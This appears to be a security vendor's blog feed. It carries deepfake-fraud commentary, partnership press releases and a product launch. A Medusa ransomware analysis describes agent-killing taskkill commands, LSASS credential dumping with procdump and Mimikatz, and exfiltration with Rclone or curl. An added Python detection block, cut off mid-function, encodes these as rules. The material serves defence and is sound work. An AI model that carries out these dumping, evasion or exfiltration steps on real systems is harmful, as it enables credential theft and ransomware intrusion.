X-PHY – https://x-phy.com

The Cost of Deepfake Tools Just Hit Zero – And Your Security Strategy Needs to Catch Up
https://x-phy.com/the-cost-of-deepfake-tools-just-hit-zero-and-your-security-strategy-needs-to-catch-up/
Thu, 06 Nov 2025 08:26:06 +0000

As featured in Help Net Security: Cybercriminals have built a business on YouTube’s blind spots

The barrier to entry for deepfake fraud has collapsed. What used to require technical expertise, expensive software, and significant time now takes minutes with free AI models and a laptop.

This is a real and present threat: cybercriminals have turned platforms like YouTube into profitable attack vectors.

In a recent Help Net Security article, our CEO Camellia Chan weighs in on how organisations need to respond to the industrialisation of deepfake scams. The piece examines how YouTube’s 2.53 billion users have become targets for AI-powered fraud that traditional security controls simply were never designed to stop.

YouTube Has Become a Business Opportunity for Cybercriminals

The article highlights several large-scale operations exploiting YouTube’s trust infrastructure:

The “Ghost Network” malware campaign involved over 3,000 videos uploaded to fake or hijacked channels. These videos promised cracked software or game hacks, but instead delivered phishing pages and malware downloads. By the time YouTube’s moderation team flagged them, thousands of users had already been compromised.

Deepfake crypto scams have weaponized the likenesses of public figures like Elon Musk, Donald Trump, and Nvidia CEO Jensen Huang to promote fraudulent investment schemes. In one case, a fake Nvidia GTC livestream featuring a deepfake of Jensen Huang drew approximately 100,000 viewers and ranked above the official stream in search results before being taken down.

Hijacked verified channels are being repurposed at scale. Scammers buy or compromise established YouTube accounts with followers and algorithmic trust, then keep the verification badge while flooding the channel with AI-generated scam content. Users see the blue checkmark and assume legitimacy – exactly what attackers are counting on.

As the article notes, researchers found that scammers are even hijacking legitimate business accounts – like a Norwegian design agency’s Google Ads account – to run sophisticated phishing campaigns that mirror official TradingView branding, complete with verified badges and pixel-perfect layouts.

The Economics of Deepfake Fraud Are Accelerating

The financial impact is staggering. According to Deloitte research cited in the article, GenAI-driven fraud losses in the United States are projected to reach $40 billion by 2027, up from $12.3 billion in 2023. That’s a 225% increase in just four years.

This surge is directly tied to the commoditisation of deepfake technology. What was once the domain of nation-state actors and well-funded criminal organisations is now accessible to anyone with an internet connection. Free tools, open-source models, and “deepfake-as-a-service” platforms have turned synthetic media creation into a scalable, low-cost operation.

The article points out that scammers no longer need Hollywood-level production quality. They just need content that’s convincing enough to fool someone for 30 seconds – the time it takes to click a malicious link, download malware, or authorize a fraudulent transaction.

Traditional Security Controls Aren’t Built for This

Now here is the uncomfortable truth: your firewall doesn’t filter synthetic media. Your email gateway doesn’t scan YouTube videos. Your endpoint protection doesn’t flag a tutorial that looks legitimate but delivers ransomware.

The attack surface has expanded beyond the network perimeter into content platforms, social media, and communication channels that employees use every day. And because these threats don’t rely on traditional malware signatures or network anomalies, they slip past conventional defenses undetected.

As our CEO Camellia Chan told Help Net Security: “Treat deepfakes like any other cyber threat and apply a zero-trust mindset. That means don’t assume anything is real just because it looks or sounds convincing.”

This philosophy is at the core of how X-PHY approaches synthetic media detection. Zero-trust can’t stop at authentication and access control anymore. It has to extend to every piece of content your organization encounters – video, audio, images, and documents.

What 2026 Will Bring (And Why You Need to Prepare Now)

The Help Net Security article projects that scam activity on YouTube will continue to rise in 2026 as AI tools become even more accessible and affordable. Here’s what security leaders should expect:

  • Faster, cheaper production means more scams will reach wider audiences before platforms can respond
  • Coordinated networks of fake creators will post, comment, and interact with each other to appear authentic and game algorithmic recommendations
  • More hijacked channels with established audiences and trust will be weaponized for malware distribution and fraud
  • Deepfakes of public figures will drive a new wave of investment scams, disinformation campaigns, and brand impersonation attacks

Reactive content moderation cannot scale to meet this threat. By the time human reviewers flag and remove malicious content, the damage is already done – systems are compromised, money is stolen, and trust is eroded.

The X-PHY Approach to Deepfake Detection

At X-PHY, we have built our deepfake detection solution on a simple premise: if the threat operates at the speed of AI, your defenses need to as well.

X-PHY Deepfake Detector uses multi-modal AI to analyse synthetic media in real time, enabling:

  1. Real-time detection of AI-generated video, audio, and images without relying on cloud connectivity or external APIs
  2. On-device processing that works in high-security, air-gapped environments where traditional SaaS solutions can’t operate
  3. Zero-trust verification that treats all content as untrusted until proven authentic—no assumptions based on source, verification badges, or visual quality

The Path Forward: From Awareness to Action

The Help Net Security article makes clear that deepfakes aren’t a niche threat or a distant concern anymore. Deepfakes are a present, profitable, and rapidly scaling attack vector that’s already costing organizations billions.

Security awareness training won’t solve this. Telling employees to “be vigilant” or “look for red flags” is insufficient when the fakes are pixel-perfect and contextually flawless. You can’t train humans to outperform AI-generated deception.

Instead, organisations need to:

  1. Expand their threat model to include synthetic media as a critical attack vector across email, collaboration tools, social platforms, and public content
  2. Implement zero-trust principles for content verification – not just network access and authentication
  3. Deploy autonomous detection across the stack that operates at the speed and sophistication of the attacks themselves
  4. Build incident response capabilities specifically designed to handle deepfake scenarios, including brand impersonation, executive fraud, and synthetic media manipulation

Want to learn more about how X-PHY Deepfake Detector works? Schedule a demo or technical briefing with our team here.

X-PHY Inc partners Athena Dynamics to expand access to hardware-based cybersecurity solutions in Asia
https://x-phy.com/x-phy-inc-partners-athena-dynamics-to-expand-access-to-hardware-based-cybersecurity-solutions-in-asia/
Tue, 04 Nov 2025 03:11:34 +0000
Partnership enhances delivery of X-PHY’s patented hardware-embedded security solutions to public and critical infrastructure sectors

Singapore, 4 November 2025 – Cybersecurity firm X-PHY Inc has appointed Athena Dynamics Pte Ltd as its strategic market access partner for the Asia-Pacific region, expanding its presence in Singapore and across Asia.

The partnership aims to deliver X-PHY’s hardware-embedded security solutions to public and critical infrastructure sectors. Recent advisories from the Cyber Security Agency of Singapore (CSA) highlight that sophisticated ransomware can bypass traditional software defences. X-PHY’s Cybersecure Solid State Drive (SSD) provides AI-driven, hardware-level protection that detects tampering and abnormal activity autonomously, safeguarding sensitive data even if software defences fail.

X-PHY’s portfolio also includes the X-PHY Deepfake Detector, designed in line with the Monetary Authority of Singapore (MAS) Technology Risk Management (TRM) Guidelines. The endpoint-based tool allows financial institutions to detect deepfakes on corporate devices without relying on the cloud, keeping sensitive data secure.

Camellia Chan, CEO of X-PHY Inc, said, “Our current threat landscape demands more than software-based defenses. Hardware must be the first line of defense, embedding intelligence at the core of every device. This is what X-PHY delivers—proactive, autonomous protection that stops attacks before they escalate. Our partnership with Athena Dynamics extends this critical layer of security to organisations across Singapore and Asia. Together, we are advocating for a holistic security stack that encompasses both hardware and software layers.”

Athena Dynamics CEO Ken Soh added, “The partnership is timely and strategic, especially with the recent MAS advisory in September 2025 highlighting the rising threat of deepfake-related scams. X-PHY’s hardware-based security proposition uniquely fills a critical gap left by software-only cybersecurity platforms, which can be disabled or manipulated by bad actors before they are able to actively implement their protective measures.”

The collaboration will leverage Athena Dynamics’ established presence in Singapore and regional network to boost cyber resilience for government, defence, and enterprise clients. Initiatives will include joint customer briefings, proof-of-concept deployments, and co-developed solution bundles across the Asia-Pacific.

About X-PHY Inc

X-PHY Inc is a pioneering cybersecurity company dedicated to hardware-based cybersecurity solutions that protect data at its core. Built on the principle of Security by Design, X-PHY embeds protection directly at the physical layer for proactive, autonomous, and real-time defense against evolving cyber threats. Headquartered in California, USA, X-PHY Inc was established in 2021 and has since developed a growing portfolio of 53 patents, reinforcing its commitment to innovative AI-embedded security at the hardware level. The company’s patented solutions safeguard endpoints, servers, and data centers, ensuring zero-trust resilience across industries.

X-PHY Inc is part of the Flexxon Group, a leader in hardware engineering and memory solutions, leveraging its legacy of innovation and expertise in secure storage to build cutting-edge cybersecurity technologies for the digital world.

About Athena Dynamics

Athena Dynamics (ADPL) is a Singapore-based cybersecurity consulting firm founded in 2014 through a spin-off from SGX-listed BHG Group. Specialising in disruptive technologies, ADPL serves government, defense, maritime, and enterprise sectors. Its ethical hacking arm, Good Hacker Alliance, features experts with world-class credentials. With over 300 enterprise clients, ADPL earned recognition through more than 300 invited thought leadership contributions. Awards include Cyber Security Leaders 2023 (AiSP/CSA), ASEAN CIO 100, and D&B Business Eminence 2022. ADPL’s CEO chairs SGTech’s Cyber Security Chapter, and the firm continues expanding regionally, focusing on advanced solutions where conventional methods fall short.

For media queries, please contact:

X-PHY Inc
Samantha Wong, Director, Communications & Media
Email: samantha@flexxon.com  

Athena Dynamics
Ewen Lim, Head of Marketing
Email: ewen.lim@athenadynamics.com

X-PHY Inc and Ensign InfoSecurity Ink Strategic Partnership to Fortify Cyber Resilience Across Asia and Beyond
https://x-phy.com/x-phy-inc-and-ensign-infosecurity-ink-strategic-partnership-to-fortify-cyber-resilience-across-asia-and-beyond/
Wed, 22 Oct 2025 04:09:21 +0000

The official signing ceremony took place today at GovWare 2025 (From L-R: Mr Lim Minhan, Executive Vice President and Head of Consulting at Ensign InfoSecurity, Mr Simon Cheong, Senior Vice President and Head of Sales for International Business & Commercial at Ensign InfoSecurity, Ms May Chng, Co-Founder and Chief Operating Officer of X-PHY Inc, Mr Ted Tan, Board Advisor of the Flexxon Group)

Singapore, 22 October 2025 – X-PHY Inc, the cybersecurity arm of the Singapore-headquartered Flexxon Group and a leader in hardware-based cybersecurity solutions, and Ensign InfoSecurity, Asia Pacific’s largest pure-play, end-to-end cybersecurity service provider, have entered into a strategic partnership to strengthen cyber resilience across critical sectors. Together, the parties will explore the co-development and commercialisation of joint innovations that combine their respective areas of expertise to deliver holistic and seamlessly integrated solutions that secure the digital systems of clients around the world.

The agreement was formalised at GovWare 2025, Singapore’s flagship cybersecurity event that brings together leaders from the public and private sectors across Asia. Ms May Chng, Co-Founder and Chief Operating Officer of X-PHY Inc, and Mr Simon Cheong, Senior Vice President and Head of Sales for International Business & Commercial at Ensign InfoSecurity, signed the partnership agreement on behalf of their respective organisations, with Mr Ted Tan, Board Advisor of the Flexxon Group, and Mr Lim Minhan, Executive Vice President and Head of Consulting at Ensign InfoSecurity, in attendance as witnesses.

The partnership combines X-PHY’s patented AI-embedded hardware cybersecurity innovations – including the X-PHY Cybersecure Solid State Drive and Deepfake Detector – with Ensign’s deep capabilities in end-to-end cybersecurity services, creating a powerful synergy that delivers holistic protection across both hardware and software layers.  

This collaboration also opens opportunities for joint innovation to further enhance the combined portfolio of products, solutions and services offered by both organisations, bridging the gap between device-level protection and enterprise-wide defense against deepfakes, enabling organisations to achieve true end-to-end cyber resilience.

May Chng, Co-Founder & Chief Operating Officer, X-PHY Inc, said: “This partnership unites best-in-class innovation and expertise – combining X-PHY’s advanced hardware-embedded technologies with Ensign’s deep capabilities in technology development, integration and managed security. Together, we are raising the bar for proactive, autonomous and holistic security across the digital infrastructures within Singapore and beyond.”

Simon Cheong, Senior Vice President & Head of Sales for International Business & Commercial, Ensign InfoSecurity, said: “Cybersecurity today demands more than point solutions and requires tightly integrated capabilities that secure every layer, from devices to enterprise systems. This partnership brings together X-PHY’s hardware innovation with Ensign’s deep cybersecurity expertise to create a unified defence fabric that is both intelligent and resilient. By combining our strengths, we are not just enhancing protection but also shaping how next-generation cyber defence is built and delivered.”

Leveraging Ensign’s deep capabilities in end-to-end cybersecurity services and its established global network, the partnership will enhance the reach of these innovations beyond Singapore, supporting cybersecurity modernisation efforts across key regions and countries such as Asia-Pacific, Japan, India, and Europe – showcasing Singapore’s strength as a hub for cybersecurity innovation and export.

Advancing Singapore’s and the Region’s Digital Agendas

The collaboration supports Singapore’s strategic direction towards a multi-layered, coordinated cybersecurity approach – one grounded in the principles of defence-in-depth and Zero Trust readiness, as outlined in the country’s Cybersecurity Strategy 2021 and Government Zero Trust Architecture. 

By combining X-PHY’s AI-embedded, hardware-based cybersecurity technologies with Ensign’s end-to-end cybersecurity expertise and integration capabilities, the partnership helps organisations strengthen continuous validation and verification across users, devices, and systems – extending protection to the hardware layer as part of a holistic, multi-layered defense model for critical sectors.

About X-PHY Inc

X-PHY Inc is a pioneering cybersecurity company dedicated to hardware-based cybersecurity solutions that protect data at its core. Built on the principle of Security by Design, X-PHY builds AI-embedded protection directly into the physical layer to deliver proactive, autonomous, and real-time defense against evolving cyber threats.

Established in 2021, X-PHY has developed a growing portfolio of over 50 global patents, reinforcing its commitment to advancing zero-trust resilience through hardware-anchored security. Its patented technologies safeguard endpoints, servers, and data centers, providing a holistic foundation for secure digital infrastructure across industries.

For more information, please visit: 

X-PHY: x-phy.com

About Ensign InfoSecurity 

Ensign InfoSecurity is Asia Pacific’s largest pure-play, end-to-end cybersecurity service provider. Headquartered in Singapore, Ensign offers bespoke solutions and services to address its clients’ cybersecurity needs. Its core competencies are in the provision of cybersecurity advisory and assurance services, architecture design and systems integration services, and managed security services for advanced threat detection, threat hunting, and incident response. Underpinning these competencies is in-house research and development in cybersecurity. Ensign has a two-decade proven track record as a trusted and relevant service provider, serving clients from the public and private sectors in the Asia Pacific region.

For more information, please visit www.ensigninfosecurity.com

For media queries, please contact:

For X-PHY Inc
Samantha Wong, Director, Communications & Media
Email: samantha@flexxon.com
Phone: (65) 9115 6968
X-PHY Inc Appoints Acton Technology as Full-Service Strategic Partner to Strengthen Cybersecurity Presence in Southeast Asia
https://x-phy.com/x-phy-inc-appoints-acton-technology-as-full-service-strategic-partner-to-strengthen-cybersecurity-presence-in-southeast-asia/
Tue, 07 Oct 2025 03:37:33 +0000
Partnership extends reach of X-PHY’s patented AI-embedded hardware security solutions to enterprises in Singapore, Malaysia, Philippines, Thailand, and Vietnam.

Singapore, 7 October 2025 – X-PHY Inc., a pioneer in hardware-based cybersecurity solutions, today announced the appointment of Acton Technology Pte Ltd as its full-service strategic partner in Southeast Asia. The partnership will deliver next-generation AI-embedded security solutions across the region, helping enterprises build a holistic cybersecurity stack with proactive and intelligent hardware security at its foundation.

Through the partnership, Acton will provide a unified support structure that ensures customers in select regions can lean on a single trusted partner for deployment, integration, managed services, and first-line technical support.

The collaboration leverages Acton’s regional presence, covering Singapore, Malaysia, the Philippines, Thailand, and Vietnam, with a strong focus on industries where cyber resilience is critical – including finance, government, healthcare, enterprises, and critical infrastructure.

“Southeast Asia is a region experiencing rapid digital growth, and with it, a corresponding escalation of cybercrime. As cybercriminals grow in speed, sophistication and opportunity, organisations need security that is proactive, autonomous, and built directly into their systems,” said Camellia Chan, Co-Founder and CEO of X-PHY Inc. “I am glad to welcome Acton to our stable of partners, bringing together X-PHY’s patented hardware-based cybersecurity solutions and Acton’s regional expertise to deliver trusted, localized sales and support that empowers enterprises to defend against today’s most advanced attacks.”

A spokesperson from Acton said, “By partnering with X-PHY, we are expanding access to world-leading, AI-embedded cybersecurity solutions while ensuring organisations across Southeast Asia benefit from faster deployment, localized support, and tailored solutions. Our shared vision is to give enterprises peace of mind with proactive security that adapts to their evolving needs.”

Through this partnership, Acton will build on its growing portfolio of hardware-based security solutions and deliver X-PHY’s suite of solutions to its network of customers in the region. These include:

  1. X-PHY Cyber Secure SSDs and Laptops, the brand’s multi-patented and multi-awarded solution that embeds intelligent security at the memory layer for protection at the endpoint – even against zero-day threats.
  2. X-PHY Deepfake Detector, an on-device deepfake detection solution to combat digital content manipulation.

The partnership reflects X-PHY’s global expansion strategy, combining technological innovation with strong regional partnerships to set new standards for zero-trust, hardware-based protection.

Acton will be showcasing X-PHY’s suite of solutions at Tech Week Singapore from 8 to 9 October, at the Marina Bay Sands Expo and Convention Centre. Visit them at N45.

About X-PHY Inc

X-PHY Inc is a pioneering cybersecurity company dedicated to hardware-based cybersecurity solutions that protect data at its core. Built on the principle of Security by Design, X-PHY embeds protection directly at the physical layer for proactive, autonomous, and real-time defense against evolving cyber threats. Headquartered in California, USA, X-PHY Inc was established in 2021 and has since developed a growing portfolio of 53 patents, reinforcing its commitment to innovative AI-embedded security at the hardware level. The company’s patented solutions safeguard endpoints, servers, and data centers, ensuring zero-trust resilience across industries.

X-PHY Inc is part of the Flexxon Group, a leader in hardware engineering and memory solutions, leveraging its legacy of innovation and expertise in secure storage to build cutting-edge cybersecurity technologies for the digital world.

For more information, please visit: 

X-PHY: x-phy.com

Flexxon: flexxon.com 

About Acton Technology Pte Ltd 

Acton is a leading authorized semiconductor and electronic component distributor with regional coverage in Asia Pacific. Established in 2008, with its headquarters in Singapore, Acton’s distribution network spans Malaysia, the Philippines, Thailand, Vietnam and China. It provides a wide range of semiconductors, along with active, passive, electromechanical, and mechanical products from leading international manufacturers.

As a fast-growing distributor in the region, Acton Technology is committed to providing quality electronic components, value-added products, and services to its customers.

For more information, please visit: www.newgenprotect.com

For media queries, please contact:

For X-PHY Inc
Samantha Wong, Director, Communications & Media
Email: samantha@flexxon.com
Phone: (65) 9115 6968

For Acton Tech

protect@acton-tech.com

Flexxon Launches X-Mask Pro: Secure Memory Card with Built-in Encryption and Data Concealment
https://x-phy.com/flexxon-launches-x-mask-pro-secure-memory-card-with-built-in-encryption-and-data-concealment/
Tue, 30 Sep 2025 02:30:56 +0000

Delivers uncompromising security, durability, and compliance for industrial use, professional photography, and surveillance applications

Image caption: Purpose-built to ensure secure data storage in industrial applications, autonomous aircraft, professional cameras, and surveillance operations, X-Mask Pro is currently available in capacities from 64GB to 128GB. Image credit: Flexxon [1]

Singapore, 30 September 2025 – Flexxon, a global leader in industrial NAND flash storage, today announced the launch of X-Mask Pro [2] – the next evolution of the company’s best-selling X-Mask. Designed to secure and conceal sensitive data in mission-critical operations, X-Mask Pro delivers plug-and-play functionality, paired with unmatched durability, built-in encryption, and regulator-ready compliance, ensuring that vital information remains secure, intact, and invisible to unauthorised individuals.

As industries worldwide generate growing volumes of sensitive operational data – from aerospace and defense to infrastructure monitoring and autonomous systems – protecting this data at the source has become a pressing priority. With X-Mask Pro, Flexxon provides enterprises with a rugged, secure, and regulator-compliant solution that conceals confidential and vital data in field operations.

Camellia Chan, CEO and Co-founder of Flexxon said: “Data is the most valuable asset in today’s digital economy, and it must be protected at the source. Especially in industrial applications, data captured must remain secure and inaccessible to unauthorised individuals at all times. With X-Mask Pro, we are strengthening our leadership in secure storage to deliver a solution that is not only physically resilient but also digitally impenetrable – all while prioritising usability with plug-and-play functionality. Our goal is to make it easy to use for authorised parties, and impossible for prying eyes to reach their target.” 

Industrial-Grade Security and Reliability

Building on Flexxon’s long-standing prowess in developing secure industrial memory solutions, X-Mask Pro delivers a powerful combination of durability, encryption, and endurance. Rigorously tested to withstand extreme temperatures from -40°C to 85°C, high humidity, shock forces up to 1500G, vibrations, and drops from 1.5 meters, X-Mask Pro delivers consistent performance under the most demanding conditions. It is also tested against bending stress, torque, and electrostatic discharge (ESD) up to ±8kV, ensuring resilience during real-world deployment.

At the same time, X-Mask Pro’s hardware-based encryption and data concealment capabilities ensure that sensitive data remains invisible and unreadable to unauthorized users. Alongside these functions, proprietary software authentication controls in the X-Mask Pro Tool let users set up and configure the card, and conceal or unlock the data stored on it.

Beyond resilience and security, X-Mask Pro is fully regulator-ready, meeting the strictest global compliance requirements – from General Data Protection Regulation (GDPR) to national security and legal standards – and is built to support nonstop, high-volume recording across advanced applications such as HD video, LiDAR, and multispectral sensors.

How X-Mask Pro Works

At its core, X-Mask Pro integrates hardware-based encryption with proprietary authentication controls to safeguard sensitive data from interception or tampering. Unlike standard memory cards that can be easily removed, stolen, and read, X-Mask Pro keeps all stored information concealed and encrypted in the absence of authorized access.

Combined with Flexxon’s industrial-grade engineering, X-Mask Pro is resistant to extreme environmental stress, ensuring that data not only remains secure but also intact. This makes X-Mask Pro uniquely capable of addressing both security threats and environmental risks, offering end-to-end assurance for industries and professionals who require uncompromised data integrity.

Prioritising Ease of Use

X-Mask Pro is designed to make security seamless. Users first activate card security on their PC, creating a protected environment for all future use. Once activated, the card can be inserted into any device with a microSD slot, and used normally, with contents remaining fully readable during operation.

The difference comes when the card is removed or the device is powered off. At this point, all data is automatically encrypted and hidden, making it unreadable to anyone without authorization. To access the content again, users simply authenticate and unlock the card on a PC using a secure PIN.

This process ensures that data is always available to authorized users, while remaining completely inaccessible to anyone without proper access or authorization. From professional photographers managing high-value shoots to surveillance operators safeguarding sensitive footage, X-Mask Pro delivers peace of mind through end-to-end, automated protection.

Available now in capacities from 64GB to 128GB, X-Mask Pro can be purchased online through Flexxon’s eStore or any of our global authorised retailers. The full list of partners can be found here.

Footnotes:

[1] Product image is for illustration purposes only. Actual product design may vary.

[2] X-Mask is a registered trademark of Flexxon Pte Ltd.

For media queries, please contact:

Samantha Wong, Director, Communications & Media
Email: samantha@flexxon.com
Phone: (65) 9115 6968
Medusa Ransomware Prevention with X-PHY
https://x-phy.com/x-phy-solution-medusa-ransomware/
Thu, 25 Sep 2025 14:13:17 +0000

Medusa is a Ransomware-as-a-Service (RaaS) operation that has been active since June 2021, impacting over 300 victims by March 2025. The RaaS model allows the developers to “lease out” ransomware tools to affiliates, who then launch attacks in exchange for a percentage of the ransom paid. When it was first reported in 2021, Medusa was run by a centralized developer team, but over time, it evolved into a hybrid model, where affiliates carried out attacks, with developers managing core operations, such as ransom negotiations.

Unlike ransomware that simply encrypts data and demands payment, the group operates a double-extortion model: in addition to encrypting data, it threatens to publish exfiltrated data if the ransom is not paid. That threat is backed by a public leak site called Medusa Blog, where the group shames non-paying victims by releasing stolen files.

Medusa Blog
Medusa Ransomware Attack Lifecycle

I. Initial Access

Medusa developers typically recruit initial access brokers (IABs) in cybercriminal forums and marketplaces. The affiliates are offered a percentage of the ransom paid on successful attacks with the opportunity to work exclusively for Medusa. Medusa affiliates are known to utilize phishing campaigns and the exploitation of unpatched software vulnerabilities to gain initial access into the targeted organizations’ networks.

Phishing Campaigns
The phishing campaign run by the affiliates is meant to steal credentials or trick users into executing malicious payloads. They achieve this by sending deceptive emails tailored to lure unsuspecting users by impersonating trusted parties such as IT departments or HR. The emails either contain malicious attachments, prompt users to enter login credentials, or trick them into running scripts. A successful phishing campaign is marked by the adversaries gaining access to critical credentials and establishing an initial foothold when the victim executes malware. Once access is achieved, Medusa affiliates quickly escalate privileges and move laterally.

Exploitation of Unpatched Vulnerabilities
Another common technique used by Medusa affiliates to gain initial access is the exploitation of unpatched vulnerabilities in public-facing applications such as web apps, VPNs, and remote management tools. IABs favor this technique because it is quiet and, unlike phishing, needs no user interaction. Since they specialize in this kind of exploitation, they also have mature tooling such as the Metasploit framework that simplifies the process. Common Vulnerabilities and Exposures (CVEs) exploited by the Medusa group include CVE-2024-1709 and CVE-2023-48788. The group exploited CVE-2024-1709, the ScreenConnect authentication bypass, shortly after its disclosure in early 2024 to gain full remote access to target systems.

II. Discovery and Enumeration

Once inside the network, the Medusa group takes time to study the environment, learning everything they can. The attackers use this phase to identify high-value targets, map out the network structure, and look for paths to escalate access or spread laterally. This helps them maximize damage and ensure a successful encryption. Common tools and commands used in discovery and enumeration include:

III. Defense Evasion and Obfuscation

After breaching a network and conducting reconnaissance, Medusa ransomware affiliates take deliberate steps to hide their activity and avoid being detected. This allows them to remain undetected long enough to disable security tools, exfiltrate data, and carry out encryption. The attackers achieve this by disabling any security software on the target networks, living off the land (LOTL), renaming payloads, and using a custom loader.

Disabling Security Software

Medusa affiliates disable security tools before encryption to ensure there are no obstacles that could hinder their execution. They commonly use task-killing commands (taskkill /f /im <process>.exe) to stop antivirus, EDR, and backup agents. They target Windows Defender, Sophos, Trend Micro, Veeam, and backup services. They also tamper with registry keys to permanently disable defenses.

Sample list of security services for termination

Living off the Land (LOTL)

Instead of deploying flashy custom tools (which might trigger alerts), Medusa abuses legitimate Windows utilities to facilitate attacks. For instance, tools like cmd.exe, powershell.exe, and rundll32.exe are used for stealthy system manipulation. This allows them to perform malicious actions using trusted processes, making it less likely to be flagged by EDR.

Renaming Payloads
Attackers rename payloads, encode scripts, or compress files to avoid detection. The common extensions used for these purposes include .zip or .7z extensions. They may also use Base64 encoding, PowerShell obfuscation, or custom packing to avoid signature-based detection.

Using Custom Loader

Medusa ransomware uses a loader that decrypts and runs the main ransomware payload in memory. This reduces disk-based artifacts and bypasses file-based antivirus detection. This enables them to deploy ransomware at scale and operate for days or weeks without being detected.

IV. Command and Control (C2) Setup

Medusa actors use Ligolo and Cloudflared for command and control (C2) and to evade detection. Ligolo is a reverse tunneling tool that creates an encrypted connection from a compromised host back to the threat actor's machine, giving them a pivot into the internal network. Cloudflared exposes internal applications, services, or servers through a Cloudflare Tunnel without opening inbound ports, so the attackers' traffic blends in with legitimate outbound HTTPS to Cloudflare. Together they give the attackers persistent, hard-to-spot access from which to carry out the rest of the intrusion.

V. Credential Access & Lateral Movement

This step takes the attackers from a single compromised user to company-wide access. One stolen admin credential is turned into full domain control, which in turn enables network-wide encryption and extortion: the attackers can encrypt servers, steal data, and increase ransom pressure.

Medusa operators use OS credential dumping to extract usernames, passwords, and authentication tokens from compromised machines. On Windows, the main target is LSASS (Local Security Authority Subsystem Service), the process that enforces the local security policy and holds credential material in memory: NTLM hashes, Kerberos tickets and, on older or misconfigured systems, plaintext passwords. An attacker who can read LSASS memory dumps everything it holds, including admin credentials, and uses them to spread across the network silently.

Example Workflow:
  1. Gain admin access to a machine (via phishing or exploit)
  2. Use procdump to create a memory dump of LSASS
  3. Transfer the .dmp file to the attacker’s system
  4. Run Mimikatz to extract usernames, passwords, and hashes

Once attackers have valid credentials, they log in to target systems via Remote Desktop Protocol (RDP) and begin moving from system to system. RDP is often enabled on internal systems, giving attackers a broad attack surface. With administrative rights, they use tools like PsExec or wmic to execute commands and install ransomware remotely across multiple systems at once.

When attackers gain access to the Active Directory domain controller, they essentially own the network. This means that they can create new admin accounts, disable security policies, and push ransomware to every system via Group Policy Objects (GPO). Medusa affiliates often disable logging, tamper with logs, or destroy artifacts to cover their tracks after lateral movement.

VI. Exfiltration and Encryption

Once Medusa ransomware affiliates have gained initial access to the network, moved laterally, and obtained administrator-level access, they initiate the data exfiltration process. This involves copying sensitive data from internal systems to external infrastructure controlled by the attacker. They do this before encryption to maximize pressure on victims. “If you don’t pay, we’ll leak your data” is the central threat of Medusa’s extortion strategy. During the exfiltration process, the attackers target:

Example workflow

1. Attackers bundle stolen files into .zip or .7z archives using tools like WinRAR and 7-Zip.

2. They then use command-line upload tools such as Rclone, MegaCMD, or curl to exfiltrate the archives to attacker-controlled infrastructure.
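As an added example (not code from the original post, nor anything from X-PHY or the Medusa advisories it draws on), the following Python rules turn the command lines quoted in the defense-evasion, credential-access, lateral-movement and exfiltration sections above into detections over process-creation records. It assumes a minimal event shape (executable path and command line, as Sysmon Event ID 1 or Windows Security 4688 provide), an illustrative set of security-agent process names, and assumed binary names for the upload tools; all sample events are constructed.

```python
"""Command-line detection rules for the Medusa tradecraft described above.

Each rule inspects one process-creation record (a subset of the fields a
Sysmon Event ID 1 or Windows Security 4688 event carries) and returns an
Alert tagged with the attack phase it indicates. Sample events are constructed.
"""
import base64
import re
import shlex
from dataclasses import dataclass
from typing import List, Optional

# Agents Medusa affiliates are reported to kill before encryption.
# Illustrative subset of process names (assumed), not an exhaustive list.
SECURITY_PROCESSES = {
    "msmpeng.exe",               # Windows Defender
    "savservice.exe",            # Sophos
    "tmbmsrv.exe",               # Trend Micro
    "veeam.backup.service.exe",  # Veeam
}
UPLOAD_TOOLS = {"rclone.exe", "megacmd.exe"}  # assumed binary names
CURL_UPLOAD_FLAGS = re.compile(r"(?:^|\s)(?:-T|--upload-file|-F|-d)(?:\s|$)")
DEFENDER_KILL_VALUES = ("disableantispyware", "disablerealtimemonitoring")


@dataclass
class ProcessEvent:
    image: str          # full path of the executable
    command_line: str


@dataclass
class Alert:
    phase: str
    rule: str
    command_line: str


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def _argv(command_line: str) -> List[str]:
    """Tokenise a Windows command line, keeping quoted paths as one token."""
    try:
        tokens = shlex.split(command_line, posix=False)
    except ValueError:
        tokens = command_line.split()
    return [t.strip('"').lower() for t in tokens]


def rule_kill_security(ev: ProcessEvent) -> Optional[Alert]:
    """taskkill /f /im <agent>.exe aimed at a security or backup agent."""
    if _basename(ev.image) != "taskkill.exe":
        return None
    argv = _argv(ev.command_line)
    targets = {argv[i + 1] for i, a in enumerate(argv[:-1]) if a == "/im"}
    hit = sorted(targets & SECURITY_PROCESSES)
    return Alert("defense_evasion", f"taskkill of security/backup agent {hit}", ev.command_line) if hit else None


def rule_defender_registry(ev: ProcessEvent) -> Optional[Alert]:
    """reg.exe writing the policy values that switch Windows Defender off."""
    cl = ev.command_line.lower()
    if _basename(ev.image) == "reg.exe" and "windows defender" in cl and any(v in cl for v in DEFENDER_KILL_VALUES):
        return Alert("defense_evasion", "registry change disabling Windows Defender", ev.command_line)
    return None


def rule_encoded_powershell(ev: ProcessEvent) -> Optional[Alert]:
    """-EncodedCommand: decode the Base64/UTF-16LE payload so the script is visible."""
    if _basename(ev.image) not in {"powershell.exe", "pwsh.exe"}:
        return None
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", ev.command_line, re.I)
    if not m:
        return None
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace").strip()
    except ValueError:
        decoded = "<undecodable>"
    return Alert("defense_evasion", f"encoded PowerShell: {decoded}", ev.command_line)


def rule_lsass_dump(ev: ProcessEvent) -> Optional[Alert]:
    """procdump -ma lsass.exe, step 2 of the credential-dumping workflow."""
    if _basename(ev.image) in {"procdump.exe", "procdump64.exe"} and "lsass" in ev.command_line.lower():
        return Alert("credential_access", "procdump memory dump of LSASS", ev.command_line)
    return None


def rule_upload_tool(ev: ProcessEvent) -> Optional[Alert]:
    """Rclone/MegaCMD runs, or curl invoked with an upload flag."""
    img = _basename(ev.image)
    if img in UPLOAD_TOOLS or (img == "curl.exe" and CURL_UPLOAD_FLAGS.search(ev.command_line)):
        return Alert("exfiltration", f"upload tool {img} executed", ev.command_line)
    return None


def rule_remote_exec(ev: ProcessEvent) -> Optional[Alert]:
    """PsExec, or wmic process call create against a remote node."""
    img, cl = _basename(ev.image), ev.command_line.lower()
    if img in {"psexec.exe", "psexec64.exe"}:
        return Alert("lateral_movement", "PsExec remote execution", ev.command_line)
    if img == "wmic.exe" and "/node:" in cl and "process call create" in cl:
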